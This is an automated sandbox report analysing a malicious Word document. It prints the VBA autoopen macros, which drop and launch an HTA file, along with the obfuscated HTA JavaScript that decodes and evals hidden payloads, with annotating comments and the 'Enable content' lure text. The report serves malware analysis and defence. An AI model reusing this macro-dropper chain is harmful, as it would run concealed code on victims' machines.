Dynamic Analysis Report
Created on 2021-12-01T17:58:00
Sample: charge_12.01.2021.doc (Word Document)
Verdict: Malicious
Classifications: -
Threat Names: JS:Trojan.Cryxos.7513
Remarks
(0x0200004A): 132 dumps were skipped because they exceeded the maximum dump size of 7 MB. The largest one was 19 MB.
File Name | Category | Type | Verdict |
---|---|---|---|
C:\Users\RDhJ0CNFevzX\Desktop\charge_12.01.2021.doc | Sample File | Word Document | malicious |
Office Information
Keywords | ath.ebuTuoy |
Creator | aqbhmx |
Last Modified By | Пользователь Windows (Russian: "Windows User") |
Revision | 2 |
Create Time | 2021-12-01 11:28:00+00:00 |
Modify Time | 2021-12-01 11:28:00+00:00 |
Application | Microsoft Office Word |
App Version | 16.0000 |
Template | Normal |
Document Security | NONE |
Page Count | 1 |
Line Count | 55 |
Paragraph Count | 1 |
Word Count | 116 |
Character Count | 9905 |
Chars With Spaces | 10020 |
ScaleCrop | |
SharedDoc | |
VBA Macros (2)
Macro #1: ThisDocument
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Delete every "@1" marker from the document body (Replace:=2 is wdReplaceAll).
' This turns the interleaved text shown in the Document Content Snippet below into plain HTML.
Function contents()
ActiveDocument.Content.Find.Execute FindText:="@1", ReplaceWith:="", Replace:=2
End Function
' Return the Keywords property ("ath.ebuTuoy", which is "youTube.hta" reversed), then strip the markers.
Function keywords()
keywords = ActiveDocument.BuiltInDocumentProperties("keywords").Value
contents
End Function
' Create the COM object named in youDoorNext and run "explorer <youLoad>" through it.
Public Function s(youDoorNext, youLoad)
Set powGirlDow = CreateObject(youDoorNext).exec("explorer " & youLoad)
End Function
Macro #2: main
Attribute VB_Name = "main"
' Runs automatically when the document is opened.
Public Sub autoopen()
lovePowGirl = StrReverse(ThisDocument.keywords) ' "youTube.hta"
With ActiveDocument
.SaveAs2 FileName:=lovePowGirl, FileFormat:=2 ' FileFormat 2 = wdFormatText: the de-marked HTML body is written out as youTube.hta
End With
ThisDocument.s StrReverse("llehs.tpircsw"), lovePowGirl ' "wscript.shell": opens the dropped .hta via the shell file association
End Sub
Document Content Snippet
<@1h@1t@1m@1l@1>@1<@1b@1o@1d@1y@1>@1<@1d@1i@1v@1 @1i@1d@1=@1'@1k@1a@1r@1o@1l@1Y@1o@1u@1'@1 @1s@1t@1y@1l@1e@1=@1'@1f@1o@1n@1t@1-@1c@1o@1l@1o@1r@1:@1 @1#@10@10@10@1'@1>@1l@1a@1v@1e@1<@1/@1d@1i@1v@1>@1<@1d@1i@1v@1 @1i@1d@1=@1'@1t@1u@1b@1e@1G@1i@1r@1l@1'@1 @1s@1t@1y@1l@1e@1=@1'@1f@1o@1n@1t@1-@1c@1o@1l@1o@1r@1:@1 @1#@10@10@10@1'@1>@1=@1Y@1X@1Y@1y@1B@1C@1Z@1v@1d@1X@1W@1v@1V@1H@1I@19@1A@1i@1b@1l@1d@1H@1I@1B@1N@1G@1d@1p@1Z@1X@1Z@1Y@19@1k@1Y@1q@1V@12@1Y@10@1h@1i@1I@1t@1N@1H@1e@1t@1x@1m@1M@1u@1g@1X@1b@1s@1h@1G@1d@10@1B@1n@1I@1p@1s@1D@1Z@1v@1d@1X@1W@1v@1V@1n@1L@1v@1B@1X@1Z@1u@1h@1i@1I@1H@1V@1E@1V@1i@1w@1C@1I@1i@1g@1G@1d@10@1B@1n@1O@1v@18@1y@1d@1p@15@1m@1c@1l@15@1G@1d@1h@1x@12@1c@1y@1A@1T@1M@13@1I@1m@1L@1j@19@1W@1b@1v@1Q@1X@1Z@1n@1p@13@1L@1R@1J@1z@1N@13@1E@12@1R@13@1Y@10@1a@1O@1l@1D@1c@1B@1N@1W@1Y@1X@1R@1k@1Z@1G@1x@12@1R@1O@1J@1U@1Z@11@1F@1W@1c@1H@1V@1G@1Z@14@1k@12@1L@1i@1F@12@1V@1l@1h@1H@1V@1R@19@12@1R@15@1F@1U@1Q@16@1x@1k@1U@1v@1E@1U@ ... |
Extracted Image Texts (1)
Image 1: image1.gif
This document created in previous version of Microsoft Office Word
To view or edit this document, please click "Enable editing" button
on the top bar, and then click "Enable content"
YARA Matches (1)
Rule Name | Rule Description | Classification | Score |
---|---|---|---|
VBA_Obfuscation_ObjectName | VBA initializes COM object from long variable name; possible obfuscation | - | 2/5 |
c:\users\rdhj0cnfevzx\documents\~wrd0000.tmp | Dropped File | HTML | malicious |
AV Matches (2)
Threat Name | Verdict |
---|---|
JS:Trojan.Cryxos.7513 | malicious |
JS:Trojan.Cryxos.7513 | malicious |
Extracted JavaScripts (4)
JavaScript #1
// COM object factory (not called in this block)
function doorKarolDoor(girlLoveKarol) { return (new ActiveXObject(girlLoveKarol)); }
// Read the innerHTML of a hidden <div> by id
function tubePow(powTubeTube) { return (loveDoorLove.getElementById(powTubeTube).innerHTML); }
function karolDoorKarol(likeLikeLoad) { return ('cha' + likeLikeLoad); }
// Base64 decoder; the 65-character alphabet is read from the 'loveKarolLoad' element instead of being hard-coded
function dowLoadDoor(loadPowPow) {
    var doorTube = tubePow('loveKarolLoad');
    var loveGirlLoad = "";
    var tubeLove, loveLikeLove, loadLoad;
    var powNextKarol, tubeDowDoor, loveLoveDoor, loveYouYou;
    var tubeKarolYou = 0;
    loadPowPow = loadPowPow.replace(/[^A-Za-z0-9\+\/\=]/g, "");
    while (tubeKarolYou < loadPowPow.length) {
        powNextKarol = doorTube.indexOf(loadPowPow.charAt(tubeKarolYou++));
        tubeDowDoor = doorTube.indexOf(loadPowPow.charAt(tubeKarolYou++));
        loveLoveDoor = doorTube.indexOf(loadPowPow.charAt(tubeKarolYou++));
        loveYouYou = doorTube.indexOf(loadPowPow.charAt(tubeKarolYou++));
        tubeLove = (powNextKarol << 2) | (tubeDowDoor >> 4);
        loveLikeLove = ((tubeDowDoor & 15) << 4) | (loveLoveDoor >> 2);
        loadLoad = ((loveLoveDoor & 3) << 6) | loveYouYou;
        loveGirlLoad = loveGirlLoad + String.fromCharCode(tubeLove);
        if (loveLoveDoor != 64) { loveGirlLoad = loveGirlLoad + String.fromCharCode(loveLikeLove); } // index 64 is the '=' padding
        if (loveYouYou != 64) { loveGirlLoad = loveGirlLoad + String.fromCharCode(loadLoad); }
    }
    return (loveGirlLoad);
}
// Reverse a string
function loadKarolLike(likeLoveDow) { return likeLoveDow.split('').reverse().join(''); }
// Reverse, base64-decode, reverse again
function loadTubeNext(likeLikeLoad) { return (loadKarolLike(dowLoadDoor(loadKarolLike(likeLikeLoad)))); }
function loadLoadGirl(likeLikeLoad, youPowKarol) { return (likeLikeLoad.split(youPowKarol)); }
likePowLoad = window;
loveDoorLove = document;
likePowLoad.moveTo(-10, -10); // move the HTA window off-screen
// The 'tubeGirl' <div> holds two encoded payloads separated by "|||"
var girlTubeTube = tubePow('tubeGirl').split("|||");
var loveNextLove = loadTubeNext(girlTubeTube[0]);
var karolLoadDoor = loadTubeNext(girlTubeTube[1]);
JavaScript #2
// The 'karolYou' <div> holds "lave" (see the Document Content Snippet), so this resolves to window['eval'](girlPow)
function nextLovePow(girlPow) { likePowLoad[loadKarolLike(tubePow('karolYou'))](girlPow); }
JavaScript #3 (VBScript syntax: the HTA invokes the JavaScript function above once per decoded payload)
Call nextLovePow(loveNextLove) : Call nextLovePow(karolLoadDoor)
JavaScript #4
likePowLoad['close'](); // window.close(): the HTA window closes after the payloads have run
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\counters.dat | Modified File | Stream | clean |
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\content.word\~wrd0003.doc | Dropped File | Unknown | clean |
c:\users\rdhj0cnfevzx\documents\~$outube.hta | Dropped File | Stream | clean |